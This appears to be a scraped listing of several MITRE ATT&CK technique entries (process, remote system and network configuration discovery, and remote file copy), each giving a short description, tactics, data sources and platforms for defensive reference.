Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	### Windows
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre